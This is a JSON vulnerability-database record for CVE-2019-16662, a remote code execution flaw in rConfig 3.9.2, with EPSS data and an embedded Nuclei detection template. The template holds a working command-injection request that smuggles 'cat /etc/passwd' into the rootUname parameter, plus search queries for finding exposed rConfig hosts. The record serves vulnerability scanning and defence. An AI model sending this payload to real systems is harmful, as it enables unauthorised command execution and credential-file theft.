{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2019-16662/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2019-16662/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2019-16662/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2019-16662/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2019-16662/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2019-16662"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2019-16662"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.97702,
      "kev": false,
      "percentile": 0.99901
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2019/CVE-2019-16662.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2019-16662\n\ninfo:\n  name: rConfig 3.9.2 - Remote Code Execution\n  author: pikpikcu\n  severity: critical\n  description: rConfig 3.9.2 is susceptible to a remote code execution vulnerability. An attacker can directly execute system commands by sending a GET request to ajaxServerSettingsChk.php because the rootUname parameter is passed to the exec function without filtering, which can lead to command execution.\n  impact: |\n    Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and complete compromise of the affected system.\n  remediation: |\n    Upgrade to a patched version of rConfig (3.9.3 or later) or apply the vendor-supplied patch to mitigate this vulnerability.\n  reference:\n    - https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/\n    - https://nvd.nist.gov/vuln/detail/CVE-2019-16662\n    - https://drive.google.com/open?id=1OXI5cNuwWqc6y-7BgNCfYHgFPK2cpvnu\n    - http://packetstormsecurity.com/files/154999/rConfig-3.9.2-Remote-Code-Execution.html\n    - http://packetstormsecurity.com/files/155186/rConfig-3.9.2-Command-Injection.html\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2019-16662\n    cwe-id: CWE-78\n    epss-score: 0.97702\n    epss-percentile: 0.99901\n    cpe: cpe:2.3:a:rconfig:rconfig:3.9.2:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: rconfig\n    product: rconfig\n    shodan-query: http.title:\"rconfig\"\n    fofa-query: title=\"rconfig\"\n    google-query: intitle:\"rconfig\"\n  tags: cve2019,cve,intrusive,rconfig,packetstorm,rce,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23\"\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        regex:\n          - \"root:.*:0:0:\"\n\n      - type: status\n        status:\n          - 200\n# digest: 490a004630440220620fd0d74e30f80e81b939b87a5f2054334b0a04deb75e2d6a39088b4cb36bf90220672f0f9c42a6f5efb61d3cb1f41329ca8f997038f00d7c4370efbebda93eaa20:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2019-16662"
}